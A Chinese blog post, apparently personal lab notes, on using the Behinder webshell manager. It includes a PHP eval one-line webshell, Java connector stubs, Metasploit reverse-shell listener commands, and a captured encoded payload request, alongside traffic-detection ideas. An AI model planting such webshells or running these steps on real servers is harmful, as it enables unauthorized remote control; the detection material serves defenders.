冰蝎加密流程

1、本地对Payload进行加密，然后通过POST请求发送给远程服务端；
2、服务端收到Payload密文后，利用解密算法进行解密；
3、服务端执行解密后的Payload，并获取执行结果；
4、服务端对Payload执行结果进行加密，然后返回给本地客户端；
5、客户端收到响应密文后，利用解密算法解密，得到响应内容明文。

连接作者写的一句话木马

首先我们点进去可以看见有几个作者写好的webshell,我们可以选择直接使用

第一步,开启服务,将webshell放入www目录下

第二步使用Behinder进行连接,默认密码为rebeyond

连接成功

连接自己写的一句话

我写的一句话

<?php
@eval($_POST["pass"]);
?>

如果我们尝试直接连接会显示失败

这是因为我们没有使用加密,而他默认是你会加密

所以会报错

所以我们要自己添加一个解释器,需要注意,加解密需要使用Java进行编写,需要注意的是,这里你的连接密码需要写好像我一句话中的连接密码为pass,所以我加密函数中的密码也是pass

本地加密函数
private byte[] Encrypt(byte[] data) throws Exception
{
    String payload = java.net.URLEncoder.encode(new String(data),"UTF-8"); //先对Payload进行URL编码一下
    payload = String.format("pass=%s",payload);//因为最原始的一句话没有加解密逻辑，所以直接把Payload封装进Post的Key-Value对就可以
    return payload.getBytes(); 
}

这样本地的Payload就会以pass=xxx的形式发送到服务器。


本地解密函数
private byte[] Decrypt(byte[] data) throws Exception
{
   return data; //客户端收到服务器返回的数据之后，不做任何处理，直接返回。
}

远程加密函数
private byte[] Encrypt(byte[] data) throws Exception
{
    String payload = java.net.URLEncoder.encode(new String(data),"UTF-8"); //先对Payload进行URL编码一下
    payload = String.format("pass=%s",payload);//因为最原始的一句话没有加解密逻辑，所以直接把Payload封装进Post的Key-Value对就可以
    return payload.getBytes(); 
}

远程解密函数
private byte[] Decrypt(byte[] data) throws Exception
{
   return data; //客户端收到服务器返回的数据之后，不做任何处理，直接返回。
}

具体操作流程如下

下一步如下

成功连接

功能使用

命令执行

虚拟终端

虚拟终端是模拟了一个真实的交互式Shell环境，相当于把服务器侧的Shell给搬到了客户端，在这个Shell里可以执行各种需要交互式的命令，如ssh、mysql。比如说：我们可以在这个Shell里去ssh连接服务器侧内网的其他主机

同样选择powershell也是可以的

不知道为什么,我这里的执行命令,会莫名其妙的吞字符

文件管理

内网穿透

还不了解

了解到的就是本地开的socks代理

反弹shell

需要使用kali 开启msf的监听
首先msfconsole进入msf控制条

使用监听模块
use exploit/multi/handler

设置payload
set payload php/meterpreter/reverse_tcp

配置本机地址和监听端口

开始监听

连接成功

但是不知道为什么,使用很多命令都会报错,初步判断,是因为只能使用linux命令,不能使用windows命令

数据库管理

平行空间

也就是内网资产探测和管理

扩展功能

可以看见,作者已经内置了一些插件,底下还有在线安装,估计以后可以像蚁剑一样,从插件库下载插件

备忘录

经测试,只能进行文字的复制粘贴,不能复制图片,会自动保存

流量分析

关联阅读

https://blog.csdn.net/m0_55793759/article/details/127250968

流量特征

1、Accept字段
流量特征
Accept: application/json, text/javascript, */*; q=0.01

检测思路：
 浏览器可接受任何文件，但最倾向application/json 和 text/javascript
 
2、Content-Type
流量特征
Content-type: Application/x-www-form-urlencoded

检测思路：
 可以把这个字段作为一个弱特征，辅助其他特征来检测
 
3、User-agent 字段
流量特征
冰蝎设置了10种User-Agent，每次连接shell时会随机选择一个进行使用

检测思路：
 在较短较简单的content字段后加上fast_pattern关键字则会优先匹配这个content，避免浪费太长时间在匹配user-agent上
snort编写可以用content：“User-Agent”；content：“浏览器版本”，来匹配相应的十个浏览器

连接时的流量

分析不出来,等我再学学吧,确实没有耐心全部看完

POST /Behinder.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-type: application/x-www-form-urlencoded
Referer: http://192.168.1.187/f7khrc.php
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Content-Length: 3831
Host: 192.168.1.187
Connection: close
Accept-Encoding: gzip, deflate

pass=%40error_reporting%280%29%3B%0D%0Afunction+main%28%24content%29%0D%0A%7B%0D%0A%09%24result+%3D+array%28%29%3B%0D%0A%09%24result%5B%22status%22%5D+%3D+base64_encode%28%22success%22%29%3B%0D%0A++++%24result%5B%22msg%22%5D+%3D+base64_encode%28%24content%29%3B%0D%0A++++%40session_start%28%29%3B++%2F%2F%E9%8D%92%E6%BF%86%EE%9D%90%E9%8D%96%E6%9D%9Dession%E9%94%9B%E5%B2%84%E4%BC%A9%E9%8D%8F%E5%B3%9Connect%E6%B6%94%E5%AC%AA%E6%82%97%E9%90%A9%E5%AD%98%E5%B8%B4background%E9%94%9B%E5%B1%BD%E6%82%97%E7%BC%81%E7%92%AFetresult%E9%8F%83%E7%8A%B3%E7%A1%B6%E9%91%BE%E5%B3%B0%E5%BD%87cookie%0D%0A%0D%0A++++echo+encrypt%28json_encode%28%24result%29%29%3B%0D%0A%7D%0D%0A%0Afunction+Encrypt%28%24data%29%0A%7B%0A+++return+%24data%3B%0A%7D%0A%24content%3D%22dDdDQ1dxdWlHN0E0bkZQZ0dLTVVyRnRjVFpWdXJ6M1ZSenZJWkoyMzZKR28xbEp0MDIzSXpDd1BRR2VoWURBS1BMWkFOWWFVcDEwNmdUUVBHTm9PY2ZtOVJHdjlnZXRZMDB1eUhZSFhZdkc1RTU5UWRWdHFPekJUVlRUR0p4UHNYYWdkbHR4RjRYOFU5V1VQS2tlRHM0RnBSeUx5MU9aWlJOMzczWTk5T1Q1NHBwUkRaWXRWem5qcUV1Rnl1RVhuYWhNVWhZOWxhWldod0ZQdXhac3BaTU1abEhDVFV5TDN1b3ZibmhuV0lNYkw4RnpOT2ZxNU5UY0RmY2dyajlLdXNsN0tDRUpEWDRhUk5IZG4zRFBYdVJIQ21kNzhYTVRHdjZMOUFublRRcjNGWEl1NWVOejBDVnN1amd3NHFhc2RLNXdabWdiM0lKVEM2dnp4MEJQNjV4SVA3VFg1WEtmZTI4VkdGQzVqQXlma296YUluZDZOT0tEa2xsTk15d2huQjFoaUZBSmpBTnZKeVROUkVMS1hXZDRITENLOUdKYnVmZFVpbG10Z0tTWnpxcnZtVnV4c0RobWpPS3NSUnVUUGo2U1VYM2N2cnRPYXJ5RElSVzd2OVhOd29qTkdpSmFLdWl1OFpjcXR1R2loMVk3QWI1OWJPVWxEazFITVJSaEZaSlhoWlFJN2tGcGpWWFVTZUxxc1hjWFBuWjVxWlVJMklKcGgwQzVSTFJ2VzVOTDVyY01HVWFXa1VCTTRaZVNqME1DRzQzelNJd2tVWnlpeUh2WGowWGJOU2ZuZzFJTHFYaDg2NFY2M01ZNlY5ZGROSnUyNURrcTNOUDdLTERUdEwyY3JJNW40bTkxOW0wOVhpbjRMY1liSkZMS2pMWFlPYlRmUTE4UmhZTElIUGNoenZPbE9YZFZ0Zjk4WjVpUXN2UVY0enhrUmFQa3I0WUhNMlR4YmtjUFU3YmkwZGdyUmpoSUhJRFRxYlBta2JNVEM0aklLSHNCblBHUVpMSXlURzFkUGs0WGVDYjN5M1RzOXBDZkR3UWRxdWUwTUZUVWZEYVhJanBFdk10VXJ6bzEwQUtwS2ZYR0VNVjRaZjE1aWxXVXc3R1dMWU5yYU5jUExGZDZNcTVoT0M2N0NFd0QyZmRzcUVkeTRyWDQ2QUk2czc3NHFKbmowekhHTVZ1OHNIWjF6ZTBoNGlXZW1KejZmSHVnaldCaWh1OW5nMnNjbjZWbW81eGZoWlcybGlFZWE4c1ZYMWJlY1pzbGlhckhzZWZvN0xyQjc4TEVRdUR4UldXeHc2WFNKbXlVZ0Y5V3lNNHg4Z1MxV3ExY3NOenNtWFd1c0VQUHJhSjZtV2NTdFBkWFBQQU4wMXFSVXVWUGhRdVk5aHVqRGNBNnlIWjk1MjVVZnl2RkhpUmYxTFNjQVFiYW8yMHI1OVJGME5zTnhoYzduUVkxMUpLR1NSUkVSN3BSeXBpSXNXVExoU1U5Y2pSRFNuN2xTamJkV01DZHVaVnJjZHYyem4yR0tFUW12UnVjSThiREhhNmxXdWdHVkJ0WVNVdDE4dWdISHpTTHh3T2RoVDkxZ2pub0JoS3VZMEQ2cW5aU3VHcWU0bExveW02dWRLSUZ0ZGNJVHhRTnBweE1Lak9FUU1nam42a2I5OTRoUDNaSzc5V3d5NjVzbG9VUE4yYkhidlVKell1TEVpSmZkeVh3bjhERXhPaGpTWWFsYUdwVjhSeXhVQkNKRXc2TzNOQUNFYkZ4a3AzTE9GeTBNZGpaZGpzM1VUbm5tZ041U0VwRldObUhVVTVLcUN4OXJITW04QjZkbVJjZUd4b0RhcGhEeVBDNnRyZ1JoZmdKZDRPc3E2c0tjRnRDMk5SQjNNOFV2Q3NWMzlmTGpwUGNJQThxOHdSbXd3TnJ3Z3lrRG4xMVZ0R0ZNVUE0djVwNm56MzFadUpKRWlwUDI3aTdOa3NORHRlNllaR2RvNndDcVRVcG9CSVMzc0ZNZTlwVTZoekZnQThTMHN1VVpXZVE1RElJWlE3WXJZbThrcmQzRm8xNVVWdzJSRWRFYmw1NmJEekhhUXJGU3h1Y0duT211MGZaWVFIWXpvc0RXTjVYZ2U2OVdDZU5QTXZIZ3d2WkExVElSRTlrbzJEVlVnNDRTR0VkWUZiSGN6ZXkyaGFTeWF6TlI3QXZDREhXS25aWEE0TVJMNG9Yd0ZtVlM1bHZZU2RZamNTNHRNNzZRYmdFMHczWGFHWnViampZQWl5Sm1WeXpXMDN2azdlMVk3eDB3aXhvWmZSb25WVDNRWk5TUjJIT0Y0a2NmeVJIMkU1YmZZdjdOT0tScTc2QnU0V21pU1k5TTVYRUQ1OTBSaFZBcnd5ODVacjAyQ2Zja29IanM5Um9PTW1OZVFWVWFLblhrd25idnRqS3F0QkU3eUxpY2QxYUFjTkxHVTVleWdtY2E4SEpndTNGdG1zOVBhS2EzRVVlMm9BRkhNcXFGdGkwNXlRcFRqSUZiMGlvdVNJVkttWWtaOU5FZjhWOWFwd3RJTXBLY1NRTFB5RVQxdDRLVnZ6WWFrZGtzN1FrYXp5bVM4WHNhSFlSa0F1V1JWRzk0ckF3TnFrN1dHU3JySHpvOThuYnNkbXN2eDRjaldIMkFWRDRoZzI2Q0xMYjBCVXA3U2tvSzJTZXFURElSeDZpUHM3ZTVuSDV6bE5jbTBaMVEwTlVGdzhOTDc5dGlMdk91b1JiZGxQeDRrdnNqN09HMTJXTnFZMWNnVjd5eE5vcTdzZ0JNRFpqZXV1dG9uODEydE9Fam5mQ1l3RklBNXM0QWlvZkRKSjFCWENiVTdtRFZaMmtGUWpWTzRhT1NFTlAyTkc4VXpmN2Y3Q1lyUU0wcHhjUEhvdzFUaHY1V0pQdng3NnFrZ2hKT0FYVllaRFlzS3lkNHp0SDViVVh0eGtJaGRrMEtjVGVtNEtsSThOeGFRN2IwaURObEtrbHhiMEJPQmdBdnRoQVQ3%22%3B%24content%3Dbase64_decode%28%24content%29%3B%0D%0Amain%28%24content%29%3B

Views: 7